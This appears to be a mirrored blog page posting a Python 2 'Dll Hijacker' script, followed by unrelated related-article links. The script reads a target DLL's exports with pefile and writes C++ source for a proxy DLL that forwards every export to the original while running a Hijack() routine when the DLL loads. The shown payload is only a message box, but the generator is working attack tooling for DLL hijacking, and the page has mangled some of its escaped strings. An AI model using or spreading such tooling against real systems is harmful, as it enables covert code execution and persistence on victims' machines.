zoukankan      html  css  js  c++  java
  • Dll Hijacker

    #coding=utf-8
    #
    # Dll Hijacker
    #
    # platform: Python 2.x @ Windows 
    #
    # author:Coca1ne
    
    import os,sys,time
    import pefile
    
    
    def main():
        try:
            pe = pefile.PE(sys.argv[1])
            exportTable = pe.DIRECTORY_ENTRY_EXPORT.symbols
            print "[!]Find export function :[ %d ]
    " % len(exportTable)
            for exptab in exportTable: 
                print "%3s %10s" % (exptab.ordinal, exptab.name)
            print "
    [+] generating DLL Hijack cpp file ..."
            
            generate(exportTable)
            
            print "
    [+] generating DLL Hijack cpp file has finished!"
        except Exception, e:
            print e
    
    def generate(exportTable):
        segments = r"//Generate by DLLHijacker.py
    
    #include <Windows.h>
    
    DEFINE_DLL_EXPORT_FUNC
    #define EXTERNC extern "C"
    #define NAKED __declspec(naked)
    #define EXPORT __declspec(dllexport)
    #define ALCPP EXPORT NAKED
    #define ALSTD EXTERNC EXPORT NAKED void __stdcall
    #define ALCFAST EXTERNC EXPORT NAKED void __fastcall
    #define ALCDECL EXTERNC NAKED void __cdecl
    
    namespace DLLHijacker
    {
        HMODULE m_hModule = NULL;
        DWORD m_dwReturn[17] = {0};
        inline BOOL WINAPI Load()
        {
            TCHAR tzPath[MAX_PATH];
            lstrcpy(tzPath, TEXT("DLL_FILENAME.dll"));
            m_hModule = LoadLibrary(tzPath);
            if (m_hModule == NULL)
                return FALSE;
            return (m_hModule != NULL);
        }
        inline VOID WINAPI Free()
        {
            if (m_hModule)
                FreeLibrary(m_hModule);
        }
        FARPROC WINAPI GetAddress(PCSTR pszProcName)
        {
            FARPROC fpAddress;
            CHAR szProcName[16];
            fpAddress = GetProcAddress(m_hModule, pszProcName);
            if (fpAddress == NULL)
            {
                if (HIWORD(pszProcName) == 0)
                {
                    wsprintf(szProcName, "%d", pszProcName);
                    pszProcName = szProcName;
                }
                ExitProcess(-2);
            }
            return fpAddress;
        }
    }
    using namespace DLLHijacker;
    VOID Hijack()
    {
        MessageBoxW(NULL, L"DLL Hijack! by DLLHijacker", L":)", 0);
    }
    BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
    {
        if (dwReason == DLL_PROCESS_ATTACH)
        {
            DisableThreadLibraryCalls(hModule);
            if(Load())
                Hijack();
        }
        else if (dwReason == DLL_PROCESS_DETACH)
        {
            Free();
        }
        return TRUE;
    }
    "
        filename = sys.argv[1][sys.argv[1].rindex('\')+1:sys.argv[1].rindex('.')]
        fp = open(filename + ".cpp", "w+")
        define_dll_exp_func = ""
        for exptable in exportTable:
            define_dll_exp_func += r"#pragma comment(linker, "/EXPORT:" + str(exptable.name) +
                                "=_DLLHijacker_" + str(exptable.name) + ",@"+ str(exptable.ordinal) +"")
    "
        segments = segments.replace('DLL_FILENAME', filename)
        segments = segments.replace("DEFINE_DLL_EXPORT_FUNC", define_dll_exp_func).replace('\','')
        fp.writelines(segments)
        
        forward_dll_exp_func = ""
        for exptable in exportTable:
            forward_dll_exp_func += "ALCDECL DLLHijacker_"+ str(exptable.name) +"(void)
    {" + 
                                "
            __asm POP m_dwReturn[0 * TYPE long];
        GetAddress(""+ 
                                str(exptable.name) + "")();
        __asm JMP m_dwReturn[0 * TYPE long];
    }
    "
        fp.writelines(forward_dll_exp_func)
        fp.close()
    
    def usage():
        print "Usage:"
        print "    %s c:\windows\system32\msimg32.dll" % sys.argv[0]
    
    if __name__ == "__main__":
        if(len(sys.argv) <2):
            usage()
        else:
            main()
  • 相关阅读:
    软件测试工具
    nat 转发
    修改Oracle 10g Express Edition的字符集
    java数字证书学习笔记
    【Java–XML】JDOM解析XML字符串(非XML文档)
    JAVA Web快速开发部署(Javarebel实现真正高效的tomcat热部署)
    热天稀饭配方
    javascript 使用正则实现replaceall功能
    设置eclipse中各类型文件的默认浏览器(如设置flex的.mxml的编辑器为MXML Editor)
    GAE中JDO数据清除
  • 原文地址:https://www.cnblogs.com/killbit/p/6005831.html
Copyright © 2011-2022 走看看